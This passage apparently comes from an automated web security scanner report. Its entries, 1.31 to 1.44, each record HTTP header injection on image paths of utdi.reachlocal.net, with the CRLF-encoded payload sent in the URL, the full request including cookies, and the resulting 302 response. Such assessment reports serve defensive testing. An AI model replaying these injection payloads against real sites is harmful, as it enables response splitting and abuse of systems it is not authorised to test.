Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/c530b
d59940e884/mainpic_blueguy.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/c530b
d59940e884/mainpic_blueg ...[SNIP]...
1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/mainpic_blueheadline.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 111fb%0d%0aa1ffc884fd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /111fb%0d%0aa1ffc884fd6/mainpic_blueheadline.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:25 GMT
Server: Apache
Location: http://utdi.com/111fb
a1ffc884fd6/mainpic_blueheadline.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:17 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/111fb
a1ffc884fd6/mainpic_blue ...[SNIP]...
1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_about-ovr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ac19a%0d%0a7030fac53e2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ac19a%0d%0a7030fac53e2/navbutton_about-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:40 GMT
Server: Apache
Location: http://utdi.com/ac19a
7030fac53e2/navbutton_about-ovr.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ac19a
7030fac53e2/navbutton_ab ...[SNIP]...
1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_about.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 564c7%0d%0ae0db7ba9b90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /564c7%0d%0ae0db7ba9b90/navbutton_about.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:41 GMT
Server: Apache
Location: http://utdi.com/564c7
e0db7ba9b90/navbutton_about.jpg
Vary: Accept-Encoding
Content-Length: 307
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:33 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/564c7
e0db7ba9b90/navbutton_ab ...[SNIP]...
1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_client-ovr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d5ca8%0d%0abf51af5b896 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d5ca8%0d%0abf51af5b896/navbutton_client-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/d5ca8
bf51af5b896/navbutton_client-ovr.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d5ca8
bf51af5b896/navbutton_cl ...[SNIP]...
1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_client.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 37f02%0d%0ab42a12b1bbf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /37f02%0d%0ab42a12b1bbf/navbutton_client.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:45 GMT
Server: Apache
Location: http://utdi.com/37f02
b42a12b1bbf/navbutton_client.jpg
Vary: Accept-Encoding
Content-Length: 308
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:37 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/37f02
b42a12b1bbf/navbutton_cl ...[SNIP]...
1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_contact-ovr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 7f0e7%0d%0a7c06fd67eb5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7f0e7%0d%0a7c06fd67eb5/navbutton_contact-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:34 GMT
Server: Apache
Location: http://utdi.com/7f0e7
7c06fd67eb5/navbutton_contact-ovr.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:27 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7f0e7
7c06fd67eb5/navbutton_co ...[SNIP]...
1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_contact.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload d419b%0d%0a6740deaef7b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d419b%0d%0a6740deaef7b/navbutton_contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:42 GMT
Server: Apache
Location: http://utdi.com/d419b
6740deaef7b/navbutton_contact.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d419b
6740deaef7b/navbutton_co ...[SNIP]...
1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_products-ovr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 355c6%0d%0a88702d4c646 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /355c6%0d%0a88702d4c646/navbutton_products-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:39 GMT
Server: Apache
Location: http://utdi.com/355c6
88702d4c646/navbutton_products-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:31 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/355c6
88702d4c646/navbutton_pr ...[SNIP]...
1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_products.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 789fe%0d%0a5615b38ed3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /789fe%0d%0a5615b38ed3b/navbutton_products.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/789fe
5615b38ed3b/navbutton_products.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/789fe
5615b38ed3b/navbutton_pr ...[SNIP]...
1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_projects-ovr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 6907f%0d%0a53622b16624 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6907f%0d%0a53622b16624/navbutton_projects-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:38 GMT
Server: Apache
Location: http://utdi.com/6907f
53622b16624/navbutton_projects-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/6907f
53622b16624/navbutton_pr ...[SNIP]...
1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_projects.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload ad123%0d%0aeb18754afb7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /ad123%0d%0aeb18754afb7/navbutton_projects.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
Location: http://utdi.com/ad123
eb18754afb7/navbutton_projects.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ad123
eb18754afb7/navbutton_pr ...[SNIP]...
1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_services-ovr.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 4acb8%0d%0ab541b30dd04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4acb8%0d%0ab541b30dd04/navbutton_services-ovr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:37 GMT
Server: Apache
Location: http://utdi.com/4acb8
b541b30dd04/navbutton_services-ovr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:30 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/4acb8
b541b30dd04/navbutton_se ...[SNIP]...
1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/navbutton_services.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 35525%0d%0a72310b3416a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /35525%0d%0a72310b3416a/navbutton_services.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Location: http://utdi.com/35525
72310b3416a/navbutton_services.jpg
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/35525
72310b3416a/navbutton_se ...[SNIP]...
1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]
Summary
Severity: High
Confidence: Certain
Host: http://utdi.reachlocal.net
Path: /images/partner-logos-avaya.jpg
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 3b074%0d%0ae845103065b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3b074%0d%0ae845103065b/partner-logos-avaya.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660
Response
HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/3b074
e845103065b/partner-logos-avaya.jpg
